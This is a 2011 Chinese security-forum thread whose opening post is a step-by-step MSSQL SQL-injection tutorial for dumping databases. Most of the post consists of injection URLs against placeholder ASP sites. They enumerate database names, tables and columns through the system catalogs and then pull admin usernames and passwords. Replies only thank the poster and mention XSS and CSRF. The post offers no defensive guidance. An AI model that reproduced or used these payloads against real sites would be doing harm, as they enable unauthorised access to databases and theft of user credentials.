找回密码
 注册
搜索
日志综合审计数据库安全审计运维堡垒机域名&虚拟主机游侠安全网
查看: 8045|回复: 12

MSSQL注入之爆库

 火... [复制链接]
发表于 2011-3-21 09:05:20 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?注册

×
SQL INJECTION 灵活多变,注入的语句不一,下面只提供暴库的一般步骤,希望能对你有帮助。

1:暴出所有库名.

http://www.***.com/***.asp?id=1 and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) ,依次提交 dbid = 7,8,9.... 得到更多的数据库名 。

2:暴出库中的表

假设存在一个bbs的数据库,提交下面的语句:

http://www.***.com/jump.asp?id=1 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') ,来得到一个表 假设为 admin

提交:

http://www.***.com/jump.asp?id=1 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in

('Admin')) ,来得到其他的表。

3:暴出表中的字段

提交:

http://www.***.com/***.asp?id=1 and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin'

and uid>(str(id))) ,得到UID的数值假设为18779569 uid=id

提交:

http://www.***.com/***.asp?id=1 and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) ,得到一个admin的一个字段,假设为 user_id

提交:

http://www.***.com/***.asp?id=1 and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in ('id',...)) ,来暴出其他的字段

4:暴出用户名和密码等

假设存在user_id username ,password 等字段,提交:

http://www.***.com/***.asp?id=1 and 0<(select user_id from BBS.dbo.admin where username>1)

可以得到用户名

依次可以得到密码。。。。。
回复

使用道具 举报

发表于 2011-3-21 20:42:42 | 显示全部楼层
最流行的……

或者说几年前最流行,现在还有XSS
回复 支持 反对

使用道具 举报

发表于 2011-4-21 17:04:33 | 显示全部楼层
学习了,谢谢!
回复 支持 反对

使用道具 举报

发表于 2011-4-21 17:04:35 | 显示全部楼层
学习了 感谢
回复 支持 反对

使用道具 举报

发表于 2011-5-30 13:33:15 | 显示全部楼层
学习了,谢谢
回复 支持 反对

使用道具 举报

发表于 2011-6-8 22:59:35 | 显示全部楼层
复习了 谢谢
回复 支持 反对

使用道具 举报

发表于 2011-6-8 23:00:53 | 显示全部楼层
网路游侠 发表于 2011-3-21 20:42
最流行的……

或者说几年前最流行,现在还有XSS

XSS CSRF都比较火
回复 支持 反对

使用道具 举报

发表于 2011-7-1 17:15:25 | 显示全部楼层
学习学习。
回复 支持 反对

使用道具 举报

发表于 2011-7-1 17:15:45 | 显示全部楼层
学习学习。
回复 支持 反对

使用道具 举报

发表于 2011-10-24 10:29:10 | 显示全部楼层
安全防范,常抓不懈
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|首席信息安全官 ( 陕ICP备11003551号-4 )

GMT+8, 2024-5-3 03:28 , Processed in 0.021267 second(s), 5 queries , Redis On.

Powered by Discuz! X3.5

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表